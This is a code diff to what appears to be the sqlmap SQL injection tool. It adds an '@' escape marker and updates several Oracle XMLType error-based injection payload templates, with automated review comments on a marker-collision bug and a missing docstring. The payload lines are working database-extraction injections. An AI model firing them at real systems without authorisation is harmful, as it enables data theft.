diff --git a/lib/core/agent.py b/lib/core/agent.py
index 2096ea990..82ecf07ee 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -213,6 +213,7 @@ class Agent:
payload = payload.replace("[RANDSTR1]", randStr1)
payload = payload.replace("[DELIMITER_START]", kb.misc.start)
payload = payload.replace("[DELIMITER_STOP]", kb.misc.stop)
+ payload = payload.replace("[AT_REPLACE]", kb.misc.at)
payload = payload.replace("[SPACE_REPLACE]", kb.misc.space)
payload = payload.replace("[DOLLAR_REPLACE]", kb.misc.dollar)
payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
diff --git a/lib/core/option.py b/lib/core/option.py
index e67c78c0c..a812df087 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1463,6 +1463,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
kb.misc.delimiter = randomStr(length=6, lowercase=True)
kb.misc.start = ":%s:" % randomStr(length=3, lowercase=True)
kb.misc.stop = ":%s:" % randomStr(length=3, lowercase=True)
+ kb.misc.at = ":%s:" % randomStr(length=1, lowercase=True)
kb.misc.space = ":%s:" % randomStr(length=1, lowercase=True)
kb.misc.dollar = ":%s:" % randomStr(length=1, lowercase=True)
kb.misc.forcedDbms = None
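Review bot: The new `kb.misc.at` marker on the added line is drawn independently of `kb.misc.space` and `kb.misc.dollar`, each from a single letter, so two of the three can come out identical. Assuming `randomStr(length=1, lowercase=True)` picks uniformly from 26 letters, that happens in roughly one run in nine (one in 26 with the previous two markers), and when it does the chained `.replace()` in `lib/techniques/error/use.py` decodes every occurrence as whichever character is replaced first, silently corrupting retrieved values. Draw the three letters without replacement instead, for example `kb.misc.at, kb.misc.space, kb.misc.dollar = [":%s:" % c for c in random.sample(string.ascii_lowercase, 3)]`, which needs `random` and `string` in scope (the hunk does not show this file's imports). The body of `__setKnowledgeBaseAttributes` continues outside the hunk.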
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index 0f9dde4a0..233384e59 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -185,7 +185,7 @@ def __errorReplaceChars(value):
retVal = value
if value:
- retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$")
+ retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$").replace(kb.misc.at, "@")
return retVal
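Review bot: `__errorReplaceChars` has no docstring, and after this change its decode list has to match both the nested `REPLACE(...)` wrappers in `xml/payloads.xml` and the placeholders substituted in `lib/core/agent.py`, which nothing on the changed line states. Add a docstring under the `def` line (which sits outside the hunk), such as `"""Restore characters that error-based payloads swap for kb.misc markers (space, '$', '@'); keep in sync with the REPLACE() nesting in xml/payloads.xml."""`. The replacement is applied to every matching `:x:` sequence in `value`, so the same docstring should mention that literal marker text in retrieved data is rewritten too.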
diff --git a/xml/payloads.xml b/xml/payloads.xml
index f18d0e740..40b37463e 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1117,7 +1117,7 @@ Formats:
0
1
1
- AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
@@ -1335,9 +1335,9 @@ Formats:
2
1
2
- OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
- OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
@@ -1499,9 +1499,9 @@ Formats:
0
1,3
3
- (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
- (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
@@ -1620,9 +1620,9 @@ Formats:
0
2,3
1
- ,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ ,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
- ,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ ,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]